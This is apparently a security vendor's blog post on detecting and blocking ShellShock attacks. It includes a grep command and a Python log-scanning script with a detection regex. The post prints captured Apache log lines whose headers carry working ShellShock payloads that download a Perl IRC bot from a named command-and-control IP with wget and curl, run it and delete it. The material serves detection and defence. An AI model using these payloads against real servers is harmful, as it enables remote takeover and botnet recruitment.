Protect your server from ShellShock attacks with BitNinja

Boglarka Angalet


Many servers are still affected by the ShellShock vulnerability, which gives attackers an opportunity for remote exploitation.

What does it mean?

 

If your server wasn't patched against the recently discovered ShellShock bash bug, attackers can easily get root access to it through a specially crafted HTTP request. Recently, whole botnets have started growing by exploiting this vulnerability. The best defense against ShellShock attacks is to update the bash package and so patch the bug. In addition, our team's research has found that so far, on average, 9 out of 10 ShellShock attacks have been blocked by BitNinja even without a dedicated ShellShock filter. Development of BitNinja's log-analysis module (SenseLog) is in full swing, so we can provide immediate defense against ShellShock attacks by analysing log files.

 

Have you seen ShellShock attempts lately?

 

You can easily check by issuing this command:

grep '() { :;};' /var/log/apache2/access.log

(assuming the Apache web server's default log location)

Here is an example from one of our web servers: a botnet trying to exploit the ShellShock vulnerability from several different IP addresses.

***.hu 174.127.72.77 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/ig.exe ; curl -O http://88.150.140.66/ig.exe ; perl ig.exe ; rm -rf /var/tmp/ig.exe;rm -rf ig.exe*""
***.hu 85.25.26.251 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.com 85.25.26.251 - - [27/Nov/2014:15:14:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:16:35 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:17:24 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 89.19.10.178 - - [27/Nov/2014:18:22:18 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 296 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.com 87.119.221.6 - - [27/Nov/2014:21:42:13 +0100] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 92.242.4.130 - - [01/Dec/2014:06:05:30 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 298 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""
***.hu 92.242.4.130 - - [01/Dec/2014:06:05:33 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""
***.hu 92.242.4.130 - - [01/Dec/2014:06:06:12 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 297 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""


What do they have in common?

 

The C&C (Command and Control) server at 88.150.140.66. This server controls the botnet, and it is also where the malicious Perl bot file is downloaded from. http://88.150.140.66/mid is a botnet program written in Perl.
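The grep above and the "what do they have in common" question can be answered together by a small script. The following Python example is added here and is not part of the original post or of BitNinja's software: it parses Apache combined-format lines, matches the bash function-definition pattern loosely enough to catch spacing variants of the exact `() { :;};` string (which the grep alone would miss), and tallies the attacking IPs and the hosts their payloads try to download from. The log lines, IP addresses and hostnames in it are constructed placeholders, and unlike the excerpt above they carry no leading virtual-host column.

```python
import re
from collections import Counter

# Constructed sample log, modelled on the Apache combined format shown in the post.
# All addresses are documentation ranges (RFC 5737), not real hosts.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://192.0.2.5/ig.exe ; perl ig.exe""
198.51.100.7 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://192.0.2.5/mid ; curl -O http://192.0.2.5/mid;perl mid""
198.51.100.7 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://192.0.2.5/mid ; curl -O http://192.0.2.5/mid;perl mid""
203.0.113.99 - - [27/Nov/2014:15:20:00 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# The ShellShock trigger is an exported bash function definition followed by
# trailing commands. Allowing optional whitespace and any function body catches
# variants such as "() {:;};" or "() { ignored; };" that the exact string misses.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Combined log format: client IP, identd, user, [timestamp], "request", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# URLs embedded in the injected command: the malware distribution / C&C host.
URL_RE = re.compile(r"https?://[^\s;\"']+")


def find_shellshock_attempts(log_text):
    """Return one record per line whose headers carry a ShellShock payload."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        # Everything after the status code: size, referer and user agent,
        # i.e. the header fields a bot can inject the payload into.
        payload = line[m.end():]
        if not SHELLSHOCK_RE.search(payload):
            continue
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "request": m.group("request"),
            "status": int(m.group("status")),
            "urls": URL_RE.findall(payload),
        })
    return hits


def summarize(hits):
    """Count attacking source IPs and the download hosts named in the payloads."""
    sources = Counter(h["ip"] for h in hits)
    download_hosts = Counter()
    for h in hits:
        for url in set(h["urls"]):          # count a host once per log line
            download_hosts[url.split("/")[2]] += 1
    return {"sources": sources, "download_hosts": download_hosts}


def scan_file(path):
    """Convenience wrapper for a real access log, e.g. /var/log/apache2/access.log."""
    with open(path, errors="replace") as fh:
        return find_shellshock_attempts(fh.read())


if __name__ == "__main__":
    found = find_shellshock_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["timestamp"]} {h["ip"]} "{h["request"]}" -> {h["status"]} fetches {h["urls"]}')
    print(summarize(found))
```

On the constructed sample this reports three attempts from two source IPs, all pulling from the same download host, which is exactly the "common C&C server" observation the post makes about its real excerpt. Note that a 404 in the status column does not mean the attempt failed: the payload is in the request headers, so a vulnerable CGI handler can execute it before any response is chosen.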

 

What does it do?

 

• waits for commands over IRC
• runs a full remote shell
• TCP flood
• UDP flood
• issues arbitrary HTTP requests (to spread further)

 

Protect your server from similar attacks!

 
Install BitNinja

 

Setting up takes just 3 simple steps

 

• Fill in the registration form to sign up
• Activate your account from the confirmation mail
• Install BitNinja on your server in 5 minutes with your favourite package manager (yum, apt-get)

That's it! It only takes a few minutes and your servers are protected!
